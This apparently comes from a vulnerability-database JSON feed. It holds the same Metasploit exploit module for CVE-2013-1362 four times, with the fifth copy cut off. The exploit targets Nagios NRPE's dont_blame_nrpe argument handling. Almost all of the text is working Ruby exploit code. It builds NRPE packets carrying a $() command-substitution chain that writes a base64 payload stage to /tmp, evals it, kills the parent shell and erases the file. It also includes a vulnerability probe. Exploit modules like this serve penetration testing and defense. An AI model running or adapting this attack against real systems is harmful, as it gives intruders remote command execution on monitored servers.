https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-27T12:58:46", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-27T20:54:40", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-27T20:54:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-27T20:54:40", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-04T13:00:29", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-04T13:00:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-04T13:00:29", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-04T14:57:49", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-04T14:57:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-04T14:57:49", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-06T09:01:25", "history": [], "viewCount": 70, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-06T09:01:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if 